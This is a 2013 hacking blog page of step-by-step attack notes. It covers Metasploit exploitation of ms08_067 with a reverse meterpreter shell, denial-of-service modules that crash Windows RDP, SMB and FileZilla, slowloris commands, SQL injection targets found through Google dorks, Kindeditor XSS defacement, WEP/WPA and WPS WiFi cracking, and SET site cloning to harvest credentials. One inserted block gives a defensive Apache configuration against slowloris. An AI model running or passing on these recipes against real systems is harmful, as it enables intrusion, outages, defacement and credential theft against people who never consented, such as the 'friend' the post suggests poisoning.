Showing posts with label exploits. Show all posts

Tuesday, April 23, 2013

Ettercap + SSLStrip

Want to sniff Facebook, Twitter or any other website on your network, or poison a friend's computer, even when the site uses HTTPS for its login page? Well, ettercap and sslstrip are ready to help.

Sunday, April 14, 2013

ms08_067_netapi metasploit module - quick note

1. use windows/smb/ms08_067_netapi

2. set payload windows/meterpreter/reverse_tcp

3. show options

4. show target

5. set target 4

6. show target

7. set RHOST 192.168.169.145

8. set LHOST 192.168.169.132

9. show options

10. check

11. exploit

ms12_020_maxchannelids metasploit module - quick note

1. use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

2. set RHOST 192.168.169.145

3. run

ms08_067_netapi metasploit module - quick note

1. use windows/smb/ms08_067_netapi

2. set payload windows/meterpreter/reverse_tcp

3. show options

4. show target

5. set target 4

6. show target

7. set RHOST 192.168.169.145

8. set LHOST 192.168.169.132

9. show options

10. meterpreter> run vnc  

and you will get your VNC session… ;)

Saturday, April 13, 2013

SQL Injection using HVIJ

1. Find your target using Google Dorks. Here's the full Google Dorks list,




2. Pick one of your preferred Google Dorks and start searching, putting 'inurl:' at the beginning of each query.


ex,


inurl:read.php?id=


You can combine it like this to look for a specific domain,


inurl:prod_detail.php?id= site:.mn


SQL Injection using SQLMAP

1. Still use Google dorks for finding the targets




2. Use Google dorks like this,


ex,
inurl:prod_detail.php?id=


You can combine it like this to look for a specific domain,


inurl:prod_detail.php?id= site:.mn


Web server DoS with slowloris


2. Install perl-doc to read the slowloris manual

3. Run slowloris,

./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5

4. Run slowloris against HTTPS,

./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
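Added defender-side example, not part of the original post: slowloris ties up a web server by opening many connections and sending request headers a few bytes at a time, so each worker waits on an incomplete request for as long as the server allows. The mitigation is to bound that wait. The post does not say which web server it targets; the configuration below assumes Apache httpd 2.4 with mod_reqtimeout available and shows loose request timeouts beside a hardened setting.

```apache
# Constructed example (assumes Apache httpd 2.4; the original post names no server).

# --- Weak: nothing limits how long a client may take to finish sending its
# request headers. A client that trickles one header line every few seconds
# keeps a worker busy for the whole Timeout, which is exactly what slowloris
# relies on. Old-style values like these make that window large.
Timeout 300
KeepAliveTimeout 15
# (mod_reqtimeout not loaded, so RequestReadTimeout is effectively header=0 body=0)

# --- Hardened: cap the time allowed to receive headers and body, and require
# a minimum data rate so trickling clients are dropped instead of held open.
LoadModule reqtimeout_module modules/mod_reqtimeout.so

# Headers: wait at most 20 s for the first byte; every 500 bytes received
# extends the deadline by 1 s, up to 40 s in total. Body: 20 s, same rate rule.
RequestReadTimeout header=20-40,MinRate=500 body=20,MinRate=500

# Shorter idle and keep-alive limits reduce how long one stalled connection
# can occupy a worker after the request phase.
Timeout 60
KeepAliveTimeout 5
```

After editing, `apachectl configtest` validates the syntax and `apachectl -M` lists `reqtimeout_module` once it is loaded. The rate-based limit matters more than the absolute one: an attacker can stay under a fixed header timeout by sending a byte just before it expires, but cannot stay under a minimum bytes-per-second rule without sending real data, which defeats the purpose of holding the connection open cheaply.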

Kindeditor XSS bugs

1. Find your target using this Google Dork,

inurl:examples/uploadbutton.html

You can combine it like this to look for a specific domain,

inurl:prod_detail.php?id= site:.mn

2. Open the victim URL

ex,


3. Click the upload button, choose your HTML file as the deface signature, then copy the path and paste it into the URL,

ex,


and press Enter

Hacking WPA/WPA2 without a word dictionary

This method only works against WPA/WPA2 WiFi networks with WPS enabled.

1. Install reaver,

apt-get install reaver

2. Install aircrack-ng

apt-get install aircrack-ng

3. Put your wireless card into monitor mode,

airmon-ng start wlan0


Hacking WEP

1. Make sure you're not connected to any wireless network


ifconfig wlan0 down


2. Start wifi monitor mode. If it succeeds, you will have a new wifi interface, mon0.


airmon-ng start wlan0


3. Monitor all wifi networks around you and find any WEP network nearby. Once done, hit "ctrl+c" to stop.


airodump-ng mon0


Hacking WPA/WPA2

1. Start airmon-ng


airmon-ng start wlan0


2. Monitor the wifi and keep it running!


airodump-ng -c 3 -w capturefile --bssid targetbssid --ivs mon0


ex,


airodump-ng -c 3 -w mytarget --bssid 00:11:22:33:44:55 --ivs mon0


3. Open a new terminal.


aireplay-ng -0 1 -a targetbssid -c yourmacaddress mon0


ex,


aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 55:44:33:22:11:00 mon0


Wait for the handshake!

Social Engineering Attacks - Web Clone / Harvesting Credentials

1. Run your BackTrack


2. Run the SET app


cd /pentest/exploits/set
./set


3. Choose "Social-Engineering Attacks"


4. Choose "Website Attack Vectors"


5. Choose "Tabnabbing Attack Method"


6. Choose "Site Cloner"


Friday, March 29, 2013

MS10-054 - Vulnerabilities in SMB Could Allow Remote Code Execution


Bugs : MS10-054 - Vulnerabilities in SMB Could Allow Remote Code Execution
OS : Windows XP SP 0/1
Level : Critical

Metasploit module : auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow

Use : 
  1. use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
  2. set RHOST target_ip
  3. set SMBSHARE target_share_folder_name
  4. run

Output : 
[*] Sending malformed trans2 request..
[*] The target should encounter a blue screen error now.
[*] Auxiliary module execution completed

Effect : BSOD on target machine

FileZilla FTP Server <=0.9.21 Malformed PORT Denial of Service


Bugs : FileZilla FTP Server <=0.9.21 Malformed PORT Denial of Service
OS : -
Level : Medium

Metasploit module : auxiliary/dos/windows/ftp/filezilla_server_port

Use : 
  1. use auxiliary/dos/windows/ftp/filezilla_server_port
  2. set RHOST target_ip
  3. run

Output : 
[*] Auxiliary module execution completed

Effect : FileZilla server will close